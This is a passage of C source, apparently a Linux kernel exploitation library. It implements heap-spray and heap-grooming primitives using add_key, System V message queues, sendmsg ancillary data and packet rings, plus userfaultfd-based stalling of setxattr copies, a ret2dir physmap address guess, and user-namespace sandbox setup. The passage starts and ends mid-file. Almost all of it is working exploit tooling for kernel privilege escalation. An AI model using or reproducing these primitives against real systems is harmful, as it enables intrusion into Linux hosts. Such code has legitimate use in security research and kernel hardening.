 * Exits through error_out() on failure.
 */
void unset_cpu(void)
{
	int rc = sched_setaffinity(0, sizeof(cpu_mask), &cpu_mask);

	if(unlikely(rc != 0))
		error_out("fail to unset cpu affinity");
}

/*
 * Format a printf-style message (truncated to fit a 1024-byte buffer) and
 * write it to the existing file fname with a single write() call.
 *
 * The file is opened write-only and is not created if missing.
 * Returns 0 on success, -1 if the open fails or the write is short or fails.
 */
int write_file(const char* fname, const char* fmt, ...)
{
	char content[1024];
	va_list ap;

	va_start(ap, fmt);
	vsnprintf(content, sizeof(content)-1, fmt, ap);
	va_end(ap);
	content[sizeof(content)-1] = 0;

	int out_fd = open(fname, O_WRONLY | O_CLOEXEC);
	if (out_fd == -1)
		return -1;

	// anything other than a complete write counts as failure
	int want = strlen(content);
	int status = (write(out_fd, content, want) == want) ? 0 : -1;

	close(out_fd);
	return status;
}


/*
 * Move the calling process into new user, network and mount namespaces, then
 * map the caller's original uid and gid to id 0 inside the new user namespace.
 *
 * "deny" is written to /proc/self/setgroups before gid_map is written.
 * Exits through error_out() if any step fails.
 */
void setup_sandbox(void)
{
	// capture the ids before unshare(): they are the outer side of the maps
	int real_uid = getuid();
	int real_gid = getgid();

	if (unshare(CLONE_NEWUSER | CLONE_NEWNET | CLONE_NEWNS) != 0)
		error_out("unshare fails");
	if (write_file("/proc/self/setgroups", "deny") < 0)
		error_out("write_file(/proc/self/set_groups) fails");
	// each map entry is one newline-terminated line: "<inside> <outside> <count>"
	if (write_file("/proc/self/uid_map", "0 %d 1\n", real_uid) < 0)
		error_out("write_file(/proc/self/uid_map) fails");
	if (write_file("/proc/self/gid_map", "0 %d 1\n", real_gid) < 0)
		error_out("write_file(/proc/self/gid_map) fails");
}

/*
 * Map `size` bytes of shared anonymous memory with read/write/exec protection.
 *
 * addr == NULL lets the kernel choose the address. Otherwise the mapping is
 * placed exactly at addr with MAP_FIXED.
 * Returns the mapped address. Exits through error_out() if the mapping fails.
 */
void *umem_alloc(void *addr, size_t size)
{
	void *ret;
	int flags = MAP_SHARED | MAP_ANON;
	if (addr) flags |= MAP_FIXED;
	ret = mmap(addr, size, PROT_READ | PROT_WRITE | PROT_EXEC, flags, -1, 0);
	// for a fixed request, MAP_FAILED also differs from addr, so this covers failure
	if(addr && ret != addr) error_out("[-] umem_alloc fails to mmap the fixed address %p", addr);
	// mmap() reports failure as MAP_FAILED, never as NULL
	if(!addr && ret == MAP_FAILED) error_out("[-] umem_alloc fails to mmap NULL");
	return ret;
}

/* use add_key for defragment
* add_key will allocate 5 objects in one call when the key is added for the first time
* and 4 objects afterwards
* 1. strlen(desc) and get freed eventually
* 2. plen caused by kvmalloc and get freed eventually
* 3. (struct user_key_payload) + plen, sizeof(payload)+0x18
* 4. sizeof(struct assoc_array_edit) in size of 328 (0x148), and freed if not the first time
* (5). sometimes allocate (struct assoc_array_node) twice 0x98/152
* 6. struct key, size of 0x100 -> through special cache not kmalloc
* 7. sizeof(desc), caused by kmemdup
*/
// here we use the desc method
void defragment_add_key(size_t size, u32 num)
{
	char type[] = "user";
	char *desc = alloca(size+1);
	char payload[1];

	if(num > 195) puts("num too large, defragmentation is likely to fail");

	memset(desc, 0, size+1);
	payload[0] = 'A';

	for(int i=0; i<num; i++) {
		key_serial_t key;
		rand_str(desc, size-1);
		key = add_key(type, desc, payload, sizeof(payload), KEY_SPEC_THREAD_KEYRING);
		if(key < 0) error_out("add_key failed at idx %d", i);
	}
}

void add_key_spray_num(void *payload, size_t size, u32 num)
{
	char type[] = "user";
	char desc[0x10];

	memset(desc, 0, sizeof(desc));

	for(int i=0; i<num; i++) {
		key_serial_t key;
		rand_str(desc, sizeof(desc)-1);
		key = add_key(type, desc, payload, size, KEY_SPEC_THREAD_KEYRING);
		if(key < 0) error_out("add_key failed at idx %d", i);
	}
}

// max length: 4096
void add_key_desc_spray_num(char *desc, u32 num)
{
	char type[] = "user";
	size_t size = strlen(desc);
	size_t ksize = kmalloc_size(size);
	char payload[1];

	if(num > 195) puts("num too large, defragmentation is likely to fail");
	if(ksize <= size) error_out("size too large, it should be smaller than next kmalloc size");
	if(unlikely(size) >= 4096) error_out("[-] max size of desc spray is 0x1000");

	payload[0] = 'A';

	for(int i=0; i<num; i++) {
		key_serial_t key;
		rand_str(&desc[size], ksize-size-1);
		key = add_key(type, desc, payload, sizeof(payload), KEY_SPEC_THREAD_KEYRING);
		if(key < 0) error_out("add_key failed at idx %d", i);
	}
}

static struct msg_spray_t *msg_spray_once(void *payload, size_t msg_size, u32 num)
{
	int msgqid;
	char *buf;

	// create the message queue id first
	msgqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT);
	if(unlikely(msgqid < 0)) error_out("fail to create a System V message queue");

	// prepare msg buffer
	if(payload) buf = payload;
	else {
		buf = alloca(msg_size);
		memset(buf, 'A', msg_size);
	}

	// do spray
	for(int i=0; i<num; i++) {
		if(unlikely(msgsnd(msgqid, buf, msg_size, IPC_NOWAIT) < 0)) {
			error_out("msgsnd failed at idx %d", i);
		}
	}

	// return info about this spray
	struct msg_spray_t *spray = malloc(sizeof(struct msg_spray_t));
	spray->next = NULL;
	spray->msgqid = msgqid;
	spray->payload = payload;
	spray->len = msg_size;
	spray->num = num;
	return spray;
}

struct msg_spray_t *msg_spray(void *payload, size_t msg_size, u32 num)
{
	u32 max_num = msgmnb / (msg_size + 0x30);
	u32 sent = 0;
	struct msg_spray_t *spray = NULL, *tmp_spray;

	// do max number of allocation and then repeat for a new message queue
	while(num > 0) {
		u32 todo = (num >= max_num) ? max_num : num;
		tmp_spray = msg_spray_once(payload, msg_size, todo);
		sent += todo;
		num -= todo;

		// link tmp_spray
		if(!spray) spray = tmp_spray;
		else {
			tmp_spray->next = spray->next;
			spray->next = tmp_spray;
		}
	}
	return spray;
}

struct msg_spray_t *msg_spray_max(void *payload, size_t plen)
{
	size_t size = plen + 0x30;
	u32 max_num = msgmnb / size;
	return msg_spray(payload, plen, max_num);
}

void msg_spray_clean(struct msg_spray_t *spray)
{
	void *buffer = malloc(sizeof(struct msgbuf) + spray->len);
	while(spray) {
		//printf("spray->len: %dn", spray->len);
		//printf("spray->payload: %pn", spray->payload);
		//printf("spray->num: %dn", spray->num);
		//printf("spray->msgqid: %dn", spray->msgqid);
		//printf("spray->next: %pn", spray->next);
		for(int i=0; i<spray->num; i++) {
			if (msgrcv(spray->msgqid, buffer, spray->len, 0, MSG_NOERROR | IPC_NOWAIT) == -1) {
				if(errno != ENOMSG) error_out("[msg_spray_clean]");
			}
		}
		if(msgctl(spray->msgqid, IPC_RMID, NULL)) error_out("fail to remove message queue");
		spray = spray->next;
	}
	//puts("clean done");
}

/* we don't want to spend extra time during defragmentation, so we should
 * allocate message queue ids ahead of time.
 * The difference shouldn't be too much though
 * each allocation takes about 3 microseconds
 * */
void defragment_msg(size_t size, u32 num)
{
	// should be equivalent with the orignal message in terms of heap usage
	size = (size <= 0x30) ? 0x31 : size;

	size_t msg_size = size - 0x30;
	u32 max_num = msgmnb / size;
	u32 sent = 0;

	msg_spray(NULL, msg_size, num);
}

void defragment(size_t size, u32 num)
{
	// we prefer msg_msg to do defragmentation because it does not
	// allocate extra objects
	if(size <= 0x20) defragment_add_key(size, num);
	else defragment_msg(size, num);
}

/*
 * Thread body that services exactly one userfaultfd page fault.
 *
 * arg is a struct fault_struct describing the registered range, the source
 * page, the user hook and the userfaultfd descriptor. The thread waits for
 * one fault event, runs the hook with the faulting address, resolves the
 * fault with UFFDIO_COPY and then parks itself.
 * Always returns NULL.
 */
static void *fault_handling_thread(void *arg)
{
	struct uffd_msg msg;   /* Data read from userfaultfd */
	void *page = NULL;
	struct uffdio_copy uffdio_copy;
	struct pollfd pollfd;
	struct fault_struct *fault = (struct fault_struct *)arg;
	u64 addr;
	int uffd = fault->uffd;
	pthread_detach(pthread_self());

	int found = 0;

	// polling events on uffd
	pollfd.fd = uffd;
	pollfd.events = POLLIN;
	if(poll(&pollfd, 1, -1) < 0)// wait forever if no new events
		error_out("polling error");

	dprintf("\nfault_handler_thread():\n");
	dprintf("POLLIN = %d; POLLERR = %d\n",
			(pollfd.revents & POLLIN) != 0,
			(pollfd.revents & POLLERR) != 0);

	// read the pagefault message
	if(read(uffd, &msg, sizeof(msg)) <= 0)
		error_out("fail to read uffd message");

	// sanity check the event type
	if (msg.event != UFFD_EVENT_PAGEFAULT)
		error_out("unexpected event on userfaultfd handling");

	addr = msg.arg.pagefault.address;
	dprintf("    UFFD_EVENT_PAGEFAULT event: ");
	dprintf("flags = %llx; ", msg.arg.pagefault.flags);
	dprintf("address = %llx\n", addr);

	// the fault must lie inside the range this thread was created for;
	// the source is taken at the same offset inside src_page
	u64 start = (u64)fault->addr;
	if(addr >= start && addr < start + fault->len) {
		page = addr - start + fault->src_page;
		found = 1;
	}
	if(!found)
		error_out("Can't find fault handler for addr 0x%llx", msg.arg.pagefault.address);

	// call the hook while the faulting thread is still blocked
	fault->hook((void *)addr);

	// really handle the page fault: copy one page to the page-aligned destination
	uffdio_copy.src = (unsigned long) page;
	uffdio_copy.dst = (unsigned long) addr & ~(0x1000-1);
	uffdio_copy.len = 0x1000;
	uffdio_copy.mode = 0;
	uffdio_copy.copy = 0;
	if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
		error_out("ioctl-UFFDIO_COPY");

	// after successfully handling the page fault, park the thread
	sleep(10000);

	// a pthread start routine must return a value
	return NULL;
}

/*
 * Map a region whose first access is resolved by a userfaultfd handler.
 *
 * wanted:   fixed address to map at, or NULL to let the kernel choose
 * src_page: data the handler copies in when the fault is resolved
 * len:      length of the region to map and register
 * hook:     callback run by the handler thread before it resolves the fault
 *
 * Creates a userfaultfd, maps and registers the region for missing-page
 * faults, and starts one fault_handling_thread for it.
 * Returns the mapped address. Failures are reported through error_out().
 */
void *reg_pagefault(void *wanted, void *src_page, size_t len, void (*hook)(void *))
{
	int flags = MAP_PRIVATE | MAP_ANONYMOUS;
	void *addr;
	struct uffdio_register uffdio_register;
	pthread_t tid;
	struct uffdio_api uffdio_api;

	// initialize userfaultfd api
	int uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
	if(uffd < 0) error_out("fail to call userfaultfd");
	uffdio_api.api = UFFD_API;
	uffdio_api.features = 0;
	if(ioctl(uffd, UFFDIO_API, &uffdio_api) < 0)
		error_out("ioctl UFFDIO_API error");

	// map the page that needs handling
	if(wanted) flags |= MAP_FIXED;
	addr = mmap(wanted, len, PROT_READ | PROT_WRITE | PROT_EXEC, flags, -1, 0);
	// mmap reports failure as MAP_FAILED, which a "< 0" pointer test never catches
	if(addr == MAP_FAILED || (wanted && addr != wanted)) error_out("mmap failed");

	// tell the kernel this address needs page handling
	uffdio_register.range.start = (unsigned long) addr;
	uffdio_register.range.len = len;
	uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
	if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)
		error_out("ioctl UFFDIO_REGISTER error");

	// initialize the fault_struct; it is handed over to the handler thread
	struct fault_struct *fault = malloc(sizeof(*fault));
	if(!fault) error_out("malloc error");
	fault->len = len;
	fault->src_page = src_page;
	fault->addr = addr;
	fault->hook = hook;
	fault->next = NULL;
	fault->uffd = uffd;

	// launch the fault handling thread, it will be always sleeping if the api is not used
	if(pthread_create(&tid, NULL, fault_handling_thread, fault))
		error_out("fail to create page fault handling thread");

	return addr;
}

/*
 * Page-fault subsystem initialisation hook.
 * Currently a no-op: the body is empty. It is still called from
 * init_univ_spray().
 */
void init_pagefault(void)
{
}

/* Universal Heap Spray */

/*
 * Prepare the universal spray: (re)create the file UNIV_SPRAY_FILE that the
 * spray threads later pass to setxattr, then run init_pagefault().
 */
void init_univ_spray(void)
{
	// create a dummy file, replacing any leftover from a previous run
	if(access(UNIV_SPRAY_FILE, F_OK) == 0) unlink(UNIV_SPRAY_FILE);
	// O_CREAT requires an explicit mode; without it the permission bits
	// are taken from whatever happens to be in the argument slot
	int fd = open(UNIV_SPRAY_FILE, O_CREAT, 0644);
	if(fd < 0) error_out("fail to create a file for universal heap spray");
	close(fd);
	init_pagefault();
}

/*
 * Thread body of one universal-spray worker.
 *
 * args is a heap-allocated two-element array: [0] the shared
 * struct spray_struct, [1] the user address passed to setxattr as value.
 * The array is released here once both entries have been read.
 * The thread spins until spray->stage becomes non-zero, issues one setxattr
 * call with spray->len bytes and then parks itself.
 * Always returns NULL.
 */
static void *univ_spray_func(void *args)
{
	void **args2 = (void **)args;
	struct spray_struct *spray = (struct spray_struct *)args2[0];
	void *addr = args2[1];

	// the argument array was allocated only to carry these two pointers
	free(args);

	pthread_detach(pthread_self());

	// atomic load so the compiler cannot hoist the read out of the loop
	while(!__atomic_load_n(&spray->stage, __ATOMIC_ACQUIRE));

	syscall(__NR_setxattr, UNIV_SPRAY_FILE, "libexp", addr, spray->len, 0);

	// park the thread
	sleep(10000);

	// a pthread start routine must return a value
	return NULL;
}

/*
 * Set up `num` worker threads for the universal spray.
 *
 * payload/len: object content to spray; len must be in 1..0x1000
 * num:         number of worker threads (one setxattr call each)
 * hook:        callback handed to reg_pagefault() for every worker
 *
 * For each worker a two-page window is built: the first page ends with the
 * first len-1 payload bytes, the second page is registered for page-fault
 * handling and will supply the last payload byte. The worker's setxattr
 * value pointer is placed so that the copy crosses into the second page.
 * Returns the shared control structure; pass it to univ_spray() to start.
 */
struct spray_struct *prepare_univ_spray(void *payload, size_t len, u32 num, void (*hook)(void *))
{
	// len-1 and 0x1000-len are computed below; reject values that would wrap
	if(len == 0 || len > 0x1000) error_out("invalid length for universal spray");

	void *buffer = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if(buffer == MAP_FAILED) error_out("fail to prepare for universal spray");

	// place payload at correct places: all but the last byte at the end of
	// the page, the last byte at the very start (it is served by the
	// page-fault handler as the first byte of the second page)
	memcpy(buffer+0x1000-len+1, payload, len-1);
	*(char *)(buffer) = ((char *)payload)[len-1];

	// create struct
	struct spray_struct *spray = malloc(sizeof(*spray));
	if(!spray) error_out("malloc error");
	spray->payload = payload;
	spray->len = len;
	spray->num = num;
	spray->stage = 0;

	// register for pagefault
	for(u32 i=0; i<num; i++) {
		pthread_t tid;

		// map 2 pages, initialize the first page, remap the second page for page faulting
		void *addr = mmap(NULL, 0x2000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
		if(addr == MAP_FAILED) error_out("fail to prepare for universal spray");
		memcpy(addr, buffer, 0x1000);
		reg_pagefault(addr+0x1000, buffer, 0x1000, hook);

		// start univ_spray_func thread
		void **args = malloc(sizeof(void *) * 2);
		if(!args) error_out("malloc error");
		args[0] = spray;
		args[1] = addr + 0x1000 - len + 1;
		if(pthread_create(&tid, NULL, univ_spray_func, args))
			error_out("fail to create page fault handling thread");
	}

	return spray;
}

/*
 * Release the workers created by prepare_univ_spray().
 * Sets spray->stage to 1, which the worker threads are spinning on, then
 * yields the CPU so they get a chance to run.
 */
void univ_spray(struct spray_struct *spray)
{
	// atomic store: the flag is read concurrently by the worker threads
	__atomic_store_n(&spray->stage, 1, __ATOMIC_RELEASE);
	sched_yield();
}

/*
 * Emit a burst of meaningless output: a few banner lines, the pid, and ten
 * hex dumps of a zeroed 0x400-byte buffer.
 */
void nonsense(void)
{
	char buf[0x400];
	puts("start of some fake debug message");
	// the format string needs a real newline escape, not a literal 'n'
	printf("pid: %d\n", getpid());
	puts("start of nonsense");
	memset(buf, 0, sizeof(buf));
	for(int i=0; i<10; i++) {
		hex_print(buf, sizeof(buf));
	}
}

/*
 * Stress a small-object cache through add_key.
 *
 * Adds 0x600 "user" keys with random descriptions of size-1 characters and
 * a one-byte payload to the thread keyring, then revokes that keyring.
 * A size of 0 is ignored (size-1 would wrap around).
 */
static void stress_add_key(size_t size)
{
	char type[] = "user";
	char payload[1] = { 'A' };
	char *desc;

	if(size == 0) return;

	desc = alloca(size+1);
	memset(desc, 0, size+1);

	// do spray; the returned serials are not needed because the whole
	// keyring is revoked below
	for(int i=0; i<0x600; i++) {
		rand_str(desc, size-1);
		add_key(type, desc, payload, sizeof(payload), KEY_SPEC_THREAD_KEYRING);
	}

	// cleanup spray
	keyctl(KEYCTL_REVOKE, KEY_SPEC_THREAD_KEYRING);
}

/*
 * Stress a cache through message queues: spray 0x600 messages whose total
 * footprint is `size` bytes and remove them again.
 * Sizes up to 0x30 are bumped to 0x31, as defragment_msg() does, so that
 * size - 0x30 cannot wrap around.
 */
static void stress_msg(size_t size)
{
	size = (size <= 0x30) ? 0x31 : size;

	struct msg_spray_t *spray = msg_spray(NULL, size - 0x30, 0x600);
	// nothing to clean if the spray produced no list
	if(spray) msg_spray_clean(spray);
}

/*
 * Stress the cache of `cache_size` bytes after calling set_cpu(cpuid).
 * Sizes above 0x20 use the message-queue path, smaller ones use add_key.
 */
static void stress_percpu_cache(int cpuid, size_t cache_size)
{
	set_cpu(cpuid);

	if(cache_size > 0x20) {
		stress_msg(cache_size);
	} else {
		stress_add_key(cache_size);
	}
}

/*
 * When built with STRESS defined, run stress_percpu_cache() for every entry
 * of kmalloc_size_array on every CPU index below cpu_num.
 * Without STRESS this function does nothing.
 */
void stress_all_caches()
{
#ifdef STRESS
	const size_t nr_sizes = sizeof(kmalloc_size_array)/sizeof(kmalloc_size_array[0]);
	size_t idx = 0;

	while(idx < nr_sizes) {
		size_t cache_size = kmalloc_size_array[idx];
		int cpuid = 0;

		while(cpuid < cpu_num) {
			// printf("%d %lxn", cpuid, cache_size);
			stress_percpu_cache(cpuid, cache_size);
			cpuid++;
		}
		idx++;
	}
#endif
}

/*reference: https://www.kernel.org/doc/Documentation/vm/pagemap.txt*/

/*
 * Translate a user virtual address into an address inside the region that
 * starts at page_offset_base, using /proc/self/pagemap.
 *
 * Returns page_offset_base + PAGE_SIZE * (pfn - PFN_MIN) when the pagemap
 * entry is marked present and carries a non-zero frame number.
 * Returns 0 when the entry cannot be read, is not present, or has no frame
 * number.
 */
u64 virt_to_physmap(u64 virt_addr, u64 page_offset_base)
{
	u64 kaddr = 0;
	u64 value = 0;

	int fd = open("/proc/self/pagemap", O_RDONLY);
	if(fd < 0) error_out("[virt_to_physmap] fail to open /proc/self/pagemap");

	// read the pagemap info about the input virtual address:
	// one 64-bit entry per page, indexed by virtual page number
	off_t offset = (virt_addr >> PAGE_SHIFT)*sizeof(u64);
	if(lseek(fd, offset, SEEK_SET) == (off_t)-1 ||
	   read(fd, &value, sizeof(value)) != (ssize_t)sizeof(value)) {
		// a failed or short read gives no usable entry
		close(fd);
		return 0;
	}
	// printf("pagemap: %#llx\n", value);

	// parse the value: bits 0-54 hold the frame number, bit 63 is "present"
	u64 pfn = value & ((1ULL << 55) - 1);
	u64 present = value & (1ULL << 63);
	if(present && pfn) { // if page exists and page frame exists
		kaddr = page_offset_base + PAGE_SIZE * (pfn-PFN_MIN);
	}

	close(fd);
	return kaddr;
}

/*
 * Return the number of significant bits of the global mem_size, plus one.
 * For mem_size == 0 the result is 1.
 */
int block_bit_size()
{
	// start at 1 to account for the extra bit added to the count
	int bits = 1;

	for(u64 rest = mem_size; rest > 0; rest >>= 1) {
		bits++;
	}
	return bits;
}

/*
 * Mask off the low block_bit_size() bits of a heap pointer, keeping only
 * the upper bits. The result is used by ret2dir_setup() as the base of the
 * region it targets.
 */
u64 heap_to_physmap(u64 heap_ptr)
{
	int low_bits = block_bit_size();
	int bits = 64 - low_bits;
	// the single cleared bit is shifted out of the top, leaving ones in
	// the upper `bits` positions and zeros below
	u64 mask = (~(1UL << bits)) << low_bits;

	// printf("mask: %#llxn", mask);
	return heap_ptr & mask;
}

/*
 * Fill memory with copies of src_page and guess where one of them sits.
 *
 * src_page: one page of data to replicate
 * heap_ptr: a heap pointer from which the base address is derived via
 *           heap_to_physmap()
 *
 * Maps and populates up to half of the pages covered by mem_size, each
 * holding a copy of src_page, then returns a guessed address: base plus the
 * page-aligned memory size minus half of the bytes actually sprayed.
 * If mapping fails early, the guess is based on the pages obtained so far.
 */
void *ret2dir_setup(void *src_page, u64 heap_ptr)
{
	void *kaddr = NULL;
	u64 page_offset_base = heap_to_physmap(heap_ptr);
	printf("offset_base: %#llx\n", page_offset_base);
	u64 upper_limit = mem_size & (~(PAGE_SIZE-1));

	// // first, see whether we can directly read pagemap
	// kaddr = (void *)virt_to_physmap((u64)src_page, page_offset_base);
	// if(kaddr) return kaddr;

	// we don't have access to pagemap, try to spray the same page again and again
	// we use 1/2 of the memory and hope it lands in the middle of it
	u64 wanted = (upper_limit/PAGE_SIZE)/2;
	// 64-bit counter: the page count times PAGE_SIZE must not overflow
	u64 i = 0;
	for(i=0; i<wanted; i++) {
		void *addr = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANON|MAP_PRIVATE|MAP_POPULATE, -1, 0);
		// stop spraying instead of copying into MAP_FAILED
		if(addr == MAP_FAILED) break;
		memcpy(addr, src_page, PAGE_SIZE);
	}

	// now we calculate where our page is, it is
	// version 1: (UPPER_LIMIT - pages_allocated)/2
	kaddr = (void *)(page_offset_base + upper_limit - (i/2)*PAGE_SIZE);
	// version 2: pages_allocated/2 + 0x3000
	// kaddr = (void *)(page_offset_base + (i/2)*PAGE_SIZE) + 0x3000;

	return kaddr;
}

/*
 * Fork `fork_num` helper processes that each hold one sendmsg-based
 * allocation once released.
 *
 * fork_num: number of helper processes
 * payload:  buffer used as ancillary data; its start is overwritten with a
 *           struct cmsghdr, so it must have room for one
 * len:      ancillary data length, at most optmem_max
 *
 * Each helper fills its socket until sendmsg would block, reports ready,
 * spins until the start flag is set, and then issues a blocking sendmsg
 * carrying the payload as control data.
 * Returns the control structure after all helpers reported ready; pass it
 * to sendmsg_spray() to release them.
 */
struct sendmsg_spray_t *prepare_sendmsg_spray(u32 fork_num, void *payload, size_t len)
{
	if(len > optmem_max) error_out("object too large!");

	// record the flag first: the start flag and the ready counter are the
	// first two ints of this page (presumably shared between processes by
	// umem_alloc - confirm against its definition)
	int *start_flag = umem_alloc(NULL, 0x1000);
	struct sendmsg_spray_t *spray = malloc(sizeof(*spray));
	if(!spray) error_out("malloc error");
	spray->start_flag = start_flag;
	spray->ready_proc_num = start_flag+1;

	// prepare payload data
	struct cmsghdr *first;
	first = (struct cmsghdr*)payload;
	first->cmsg_len = len;
	first->cmsg_level = 0; // must be different than SOL_SOCKET=1 to "skip" cmsg
	first->cmsg_type = 0x41414141; // <---- ARBITRARY VALUE
	// hex_print(first, 0x100);

	for(u32 i=0; i<fork_num; i++) {
		if(!clean_fork()) {
			int ret;

			// initialize unix sockets
			int socks[2];
			ret = socketpair(AF_UNIX, SOCK_DGRAM, 0, socks);
			if(ret) error_out("socketpair");

			// set timeout
			struct timeval tv;
			memset(&tv, 0, sizeof(tv));
			ret = setsockopt(socks[1], SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv));
			if(ret) error_out("setsockopt");

			// block send socket: keep sending until the queue is full
			char buf[0x100];
			struct iovec iov = {
				.iov_base = buf,
				.iov_len = sizeof(buf),
			};
			struct msghdr mhdr;
			memset(&mhdr, 0, sizeof(mhdr));
			mhdr.msg_iov = &iov;
			mhdr.msg_iovlen = 1;
			while(sendmsg(socks[0], &mhdr, MSG_DONTWAIT) > 0);
			if(errno != EAGAIN) error_out("sendmsg does not block");

			__atomic_fetch_add(spray->ready_proc_num, 1, __ATOMIC_SEQ_CST);
			// puts("block done!");

			// atomic load so the compiler cannot hoist the read out of the loop
			while(!__atomic_load_n(spray->start_flag, __ATOMIC_ACQUIRE));

			// prepare spray data
			iov.iov_len = 0x10;
			mhdr.msg_control = payload; // use the ancillary data buffer
			mhdr.msg_controllen = len;

			// this call is expected to block; returning at all is an error
			if(sendmsg(socks[0], &mhdr, 0) < 0) error_out("sendmsg spray error");
			error_out("sendmsg spray does not block");

			sleep(10000);
		}
	}

	// wait for all spray processes to get ready
	while((u32)__atomic_load_n(spray->ready_proc_num, __ATOMIC_ACQUIRE) != fork_num);

	return spray;
}

/*
 * Release the helper processes created by prepare_sendmsg_spray().
 * Sets the start flag they are spinning on to 1, then yields the CPU.
 */
void sendmsg_spray(struct sendmsg_spray_t *spray)
{
	// atomic store: the flag is read concurrently by the helper processes
	__atomic_store_n(spray->start_flag, 1, __ATOMIC_RELEASE);
	sched_yield();
}

/*
 * Issue `num` non-blocking sendmsg calls that carry `payload` (len bytes,
 * at most optmem_max) as ancillary data, on a throwaway socket pair.
 * The destination name is deliberately invalid, and the results of the
 * sendmsg calls are ignored.
 */
void sendmsg_spray_transient(u32 num, void *payload, size_t len)
{
	int socks[2];
	struct msghdr mhdr;

	if(len > optmem_max) error_out("object too large!");

	// prepare sockets
	if(socketpair(AF_LOCAL, SOCK_DGRAM, 0, socks)) error_out("socketpair");

	// prepare message: no data, only control bytes and a bogus name
	memset(&mhdr, 0, sizeof(mhdr));
	mhdr.msg_name = "random"; // invalid address
	mhdr.msg_namelen = 1;
	mhdr.msg_control = payload;
	mhdr.msg_controllen = len;
	mhdr.msg_iovlen = 0;

	// do it!
	for(u32 left = num; left > 0; left--) {
		sendmsg(socks[0], &mhdr, MSG_DONTWAIT);
	}

	// cleanup
	close(socks[0]);
	close(socks[1]);
}

static int cpu_idle_cmp(const void *arg1, const void *arg2)
{
	struct cpu_info *info1 = (struct cpu_info *)arg1;
	struct cpu_info *info2 = (struct cpu_info *)arg2;
	return info1->nr_running - info2->nr_running;
}

/*
 * Randomly permute an array in place (Fisher-Yates).
 *
 * array: first element
 * n:     number of elements
 * size:  size of one element in bytes
 *
 * The generator is reseeded from the timestamp counter on every call.
 * Arrays with fewer than two elements, or zero-sized elements, are left
 * untouched.
 */
static void shuffle(void *array, size_t n, size_t size)
{
	unsigned char *arr = array;

	srand(__rdtsc());
	if(n < 2 || size == 0) return;

	for(size_t i=0; i<n-1; i++) {
		// pick the partner from the not-yet-fixed tail [i, n) only;
		// picking from the whole array gives a biased permutation
		size_t j = i + (size_t)rand() % (n - i);
		if(j == i) continue;

		// swap the two elements byte by byte (no temporary buffer needed)
		unsigned char *a = arr + i*size;
		unsigned char *b = arr + j*size;
		for(size_t k=0; k<size; k++) {
			unsigned char t = a[k];
			a[k] = b[k];
			b[k] = t;
		}
	}
}

/*
 * Refresh idle_cpus from SCHED_DEBUG_FILE.
 *
 * For each of the first cpu_num sections starting with "cpu#", the line
 * that follows is parsed for the number after ": " and stored as that
 * CPU's nr_running. The array is then shuffled and sorted by nr_running,
 * so CPUs with equal load appear in random order.
 * If the file cannot be opened, idle_cpus is left untouched.
 */
void reload_cpu_info(void)
{
	FILE *f = fopen(SCHED_DEBUG_FILE, "r");
	char *line = NULL;
	size_t n = 0;

	if(!f) return;

	// fill up cpu info first
	int cpuid = 0;
	while(!feof(f) && cpuid < cpu_num) {
		char *nr_running_str;
		int ret;
		ret = getline(&line, &n, f);
		if(unlikely(ret < 0)) error_out("reload_cpu_info1");

		// skip everything until the start of a per-cpu section
		if(strncmp(line, "cpu#", 4)) continue;

		// the line right after the section header carries the value
		ret = getline(&line, &n, f);
		if(unlikely(ret < 0)) error_out("reload_cpu_info2");

		nr_running_str = strstr(line, ": ");
		if(unlikely(nr_running_str == NULL)) error_out("reload_cpu_info3");
		nr_running_str += 2;

		idle_cpus[cpuid].nr_running = atoi(nr_running_str);
		idle_cpus[cpuid].cpuid = cpuid;
		cpuid++;
	}
	// getline allocates the line buffer; release it once parsing is done
	free(line);
	fclose(f);

	// shuffle and sort it according to nr_running of the CPUs
	// so that the sorted array does not favor any CPUs
	shuffle(idle_cpus, cpu_num, sizeof(*idle_cpus));
	qsort(idle_cpus, cpu_num, sizeof(*idle_cpus), cpu_idle_cmp);

	//// debug print
	//for(int i=0; i<cpu_num; i++) {
	//	printf("%d: %d\n", idle_cpus[i].cpuid, idle_cpus[i].nr_running);
	//}
}

/*
 * Remove every message queue that MSG_STAT can see.
 *
 * MSG_INFO yields the index of the highest used entry in the kernel's
 * queue table; every index from 0 up to and including that one is probed
 * with MSG_STAT, and each queue found is removed with IPC_RMID.
 */
void cleanup_msgs(void)
{
	int msgqid;
	struct msqid_ds ds;
	struct msginfo msginfo;
	int maxind = msgctl(0, MSG_INFO, (struct msqid_ds *) &msginfo);
	if(maxind < 0) error_out("[msg_info]");

	// printf("cleanup %d msgs\n", maxind);

	// maxind is itself a valid index, so the bound is inclusive
	for(int i=0; i<=maxind; i++) {
		int ret;
		msgqid = msgctl(i, MSG_STAT, &ds);
		if(msgqid < 0) continue; // unused slot or not accessible
		ret = msgctl(msgqid, IPC_RMID, 0);
		if(ret < 0) error_out("[msg_rmdi]");
	}
}

/*
 * Read a u64 from `fname` via _read_u64_from_file(), or return `def_val`
 * when the file is not readable according to access().
 */
u64 _safe_read_u64_from_file(char *fname, u64 def_val)
{
	int readable = (access(fname, R_OK) == 0);

	return readable ? _read_u64_from_file(fname) : def_val;
}

/*
 * Spray page-sized buffers through an AF_PACKET socket.
 *
 * src_buf:  data to send, buf_size bytes
 * buf_size: block and frame size of the RX ring; must be a multiple of 0x1000
 * num:      number of ring blocks and number of packets sent
 *
 * Creates a raw packet socket, sets up an RX ring of `num` blocks of
 * `buf_size` bytes (one frame per block), and sends `num` copies of src_buf
 * to the "lo" interface.
 * Returns the socket descriptor; the caller keeps it open for as long as
 * the ring should stay allocated.
 */
int pg_vec_spray(void *src_buf, u32 buf_size, u32 num)
{
	if((buf_size & 0xfff) != 0) error_out("[pg_vec_spray] buf_size");

	// remember to run everything in sandbox
	int s = socket(AF_PACKET, SOCK_RAW|SOCK_CLOEXEC, htons(ETH_P_ALL));
